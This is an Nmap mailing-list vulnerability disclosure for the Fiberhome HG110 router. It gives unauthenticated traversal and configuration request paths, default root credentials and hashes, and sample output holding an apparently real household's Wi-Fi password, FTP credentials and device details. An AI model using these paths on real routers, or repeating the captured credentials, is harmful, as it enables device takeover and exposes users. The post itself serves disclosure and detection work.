Nmap Development mailing list archives

Previous By Date Next
Previous By Thread Next

[NSE] Vulnerabilities in Fibrehome HG110

From: Tom Sellers <nmap () fadedcode net>
Date: Mon, 08 Jul 2013 06:44:24 -0500
On April 8th, 2011  Zerial ( fernando () zerial org ) published[1] details of local file inclusion and directory 
traversal vulnerabilities in the Fibrehome HG110 wireless gateway.  The documentation
below expands upon his findings and provides a technical writeup of the impacts and vectors of these vulnerabilities.  
The attached script serves to provide concrete results from the vulnerabilities
described.


Summary:   Authentication bypass and complete remote compromise via HTTPS management interface in the default 
configuration of the FiberHome residential wireless gateway.


Certain Central and South American subsidiaries of Telefonica distributed a customized version of the Fiberhome HG 110 
wireless DSL gateway.  The base device appears to be an often re-branded linux
based ZTE router.  Analysis of both the Telefonica device, and those that it appears to have been derived from, 
indicates that authentication and session management controls were broken during the
customization process.   This appears to be intentional as the new authenticationless interface directly references 
files that would normally be protected.  The result is that the HG 110 router
suffers from a vulnerability that permits unauthenticated REMOTE access to configuration and status pages on the 
management interface.  In addition to exposing information about the device and
clients, this access permits the router to be configured without additional controls.  The result is that the device 
can be remotely and completely compromised permitting information disclosure,
attack against client devices, and denial of service.  It was not tested but current information indicates that the 
ability to install malware and packet sniffing tools on the device is likely.
Further, the initial reconnaissance and reconfiguration traffic would occur over SSL which would prevent monitoring the 
nature of the activities.  The only indicator of concern would be anomalous
traffic from public IP addresses.  If this traffic is kept to a minimum it would likely blend into the background noise 
of the Internet.


Known affected versions are HG110_BH_V1.6 and HG110_BH_V1.9.

The access vectors are on tcp ports 443 (SSL) and 8000 (HTTP).



Examples of abuse of this vulnerability include:

- Enabling remote SSH, TELNET, FTP and other services.  As the root password appears to be 'root' on this and similar 
models this change alone completely compromises this device.  The insecure direct
object reference vulnerability can be combined with the local file inclusion vulnerability to access the password 
hashes in the /etc/shadow file.  This permits validating that the password has not
been changed from 'root' prior to enabling SSH.  Cracking the hash is not required as all unmodified devices will have 
the same hash - '$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.'  Once the credentials are
verified the attacker could enable SSH and remotely access the device as root.

Enabling SSH can be accomplished with a single, unauthenticated HTTP POST request.

Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=services


- Forwarding of external ports to internal clients allowing direct attack of NAT/PAT'ed client devices.

Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=portforwd


- Hijacking client traffic by changing DNS configuration to point to malicious DNS servers.

Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=dns


- Compromise of all configuration details, including SSID and password/key, of the wireless network.

Path:  /cgi-bin/webproc?getpage=html/gui/APIS/returnWifiJSON.txt&var:page=null
Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wireless&var:subpage=wlbasic
Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wireless&var:subpage=wlsecurity


- Disclosure of IP address, MAC address, connectivity type, status and sometimes hostnames of devices PAT/NAT'ed behind 
the router.  Information about devices connected in the past, but without
current leases can also be captured.

Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=status&var:page=dhcpclients
Path:  /cgi-bin/webproc?getpage=html/gui/APIS/returnDevicesJSON.txt&var:page=null
Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=status&var:page=dhcpclients
Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=status&var:page=wlclients
Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=lan


- Compromise of Internet/PPP username

Path:  /cgi-bin/webproc?getpage=html/gui/APIS/returnInternetJSON.txt&var:page=null
Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wancfg


- Compromise of existing FTP server credentials and the ability to create new FTP accounts.

Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=ftpd_count_manager


- Enable the ability to re-locate a target router by configuring it to register with a dynamic DNS provider

Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=ddns


- Denial of service of remote hosts by way of SNMP amplification attack after enabling SNMP and permitting outside 
access.

Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=nwtools&var:subpage=snmp
Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=services


- Denial of service via reconfiguring many of the options and/or credentials


- Disclosure of device information, hardware, software and firmware versions, etc

Path:  /cgi-bin/webproc?getpage=html/index.html&var:menu=status&var:page=deviceinfo


- Access to usernames and password hashes:

Path:  /cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=advanced&var:page=null
Path:  /cgi-bin/webproc?getpage=../../../etc/shadow&var:menu=advanced&var:page=null


- Access to the SSL certificate private key.  This key is reused on many models of devices.  The thumbprint is 562e 
7f2f 7b3d 5913 a6ca 64f2 5854 d131 e56c 4ff7
  Issuer CN = localhost.localdomain, OU = ODC, O = Multitech, L = Bangalore, S = Karnataka, C = IN

Path:  /cgi-bin/webproc?getpage=../../../etc/mini_httpd.pem&var:menu=advanced&var:page=null


- Access to dump a portion of the device's memory.  This sometimes contains configuration data, log contents, and user 
traffic.

Path:  /cgi-bin/webproc?getpage=../../../dev/mem&var:menu=advanced&var:page=null


- Access to configuration information stored by the device

Path:  /cgi-bin/webproc?getpage=../../../usr/www/html/config/config.xml&var:menu=advanced&var:page=null


- Access to device hardware and state information

Path:  /cgi-bin/webproc?getpage=../../../proc/version&var:menu=advanced&var:page=null           /proc/version
Path:  /cgi-bin/webproc?getpage=../../../proc/cpuinfo&var:menu=advanced&var:page=null           /proc/cpuinfo
Path:  /cgi-bin/webproc?getpage=../../../proc/net/arp&var:menu=advanced&var:page=null           /proc/net/arp



In addition to illustrating some of the issues listed above, the attached script also captures the web login password 
hashes that are present in the sign on page's HTML.  These hashes are compared to
publicly known support passwords which are indicated when found.



The following is output from the attached NSE script that illustrates the access and information gained using these 
vulnerabilities.

443/tcp open  https   syn-ack
| vuln-fiberhome-hg-router:
|   Device:
|     Manufacturer: FIBERHOME
|     Serial Number: a3c31648f14f
|     Hardware Ver: HG110_BH_R1A
|     Software Ver: HG110_BH_V1.9
|     Firmware Ver: 1.0.0
|     Kernel: Linux version 2.6.19
|     LAN Interface: 192.168.1.1( b8:c7:10:18:c3:1a )
|     Time: 2000-01-02T18:31:11
|   LAN:
|     Network: 192.168.1.1 / 255.255.255.0
|   DHCP:
|     Pool: 192.168.1.50 - 192.168.1.100
|     Active: True
|   WiFi:
|     SSID: Serg_WiFI2
|     Security: WPA
|     Password: log1n21
|     Channel: 0(AUTO)
|     Active: True
|   Internet:
|     Status: up
|     Speed: Down: 6,3Mb  Up: 309Kb
|     Type: DSL
|     User: 0010001290112@domain
|     Password:
|   Branding:
|     Branding: o2
|     Link: http://movistar.es
|     Country: CH
|     Default Language: es
|   Web Credential Hashes:
|     User               Hash
|     Administrador      $1$TW$4/4tmV7BKHXCDn5keBLUT1
|     user               $1$TW$dMolyCCNuy2WxyLJ.zUWv0  ( password is Need4$MVS.cl )
|     support            $1$TW$yS.Dzi9LPS3wn0qUQMBEA1  ( password is support )
|
|   FTP Credentials:
|     User      Password
|     ftpuser   S3cr3t
|
|   /etc/passwd:
|     #root:x:0:0:root:/root:/bin/bash
|     root:x:0:0:root:/root:/bin/sh
|     #tw:x:504:504::/home/tw:/bin/bash
|     #tw:x:504:504::/home/tw:/bin/msh
|   /etc/shadow:
|     #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
|     root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::  ( password is root )
|     #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
|     #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
|   DHCP Clients:
|     IP Address        MAC Address            Name
|     192.168.1.33      00:1b:b9:e1:21:af      sergio-PC
|     192.168.1.36      74:a7:22:2a:77:4f      android_ccaaa72b455fcc52
|
|   Device History:
|     IP Address                            MAC Address            Connection Type  Status
|     192.168.1.16                          D8:5D:4C:6F:89:E0      Ethernet         disconnected
|     192.168.1.33                          00:1b:b9:e1:21:af      Ethernet         disconnected
|     192.168.1.34                          f4:0b:93:f0:0f:a1      WiFi             disconnected
|     192.168.1.35                          fc:0f:e6:09:14:22      Ethernet         connected
|     192.168.1.34                          00:22:15:27:85:9d                       disconnected
|     169.254.235.110)00:1B:B9:A5:71:A      00:1B:B9:A5:71:A                        disconnected
|     192.168.1.36                          74:a7:22:2a:77:4f      WiFi             disconnected
|     186.172.129.206)74:A7:22:24:98:1      74:A7:22:24:98:1                        disconnected
|     192.168.1.35                          00:26:6c:ef:f3:95      Ethernet         disconnected
|     192.168.1.35                          e0:ca:94:bd:06:c5      WiFi             disconnected
|     192.168.1.36                          78:e4:00:b6:35:1a      WiFi             disconnected
|     192.168.1.37                          bc:b1:f3:25:53:e3      WiFi             disconnected
|     169.254.202.102)78:E4:00:B6:35:2      78:E4:00:B6:35:2                        disconnected
|     192.168.1.34                          58:c3:8b:5c:1b:3a      WiFi             disconnected
|_    192.168.1.34                          00:1A:73:93:82:4B      WiFi             disconnected


References:

1.  Local file inclusion publicly released in April 2011 by Zerial ( fernando () zerial.org)
http://osvdb.org/show/osvdb/71827
http://seclists.org/fulldisclosure/2011/Apr/132
http://seclists.org/fulldisclosure/2011/Apr/153
http://blog.zerial.org/seguridad/vulnerabilidad-en-todos-los-routers-fiberhome-hg-110-de-telefonicamovistar/



If the attached script is suitable for inclusion I will rename and commit it.


Tom Sellers

Attachment: vuln-fiberhome-hg-router.nse
Description: 

_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
Previous By Date Next
Previous By Thread Next

Current thread: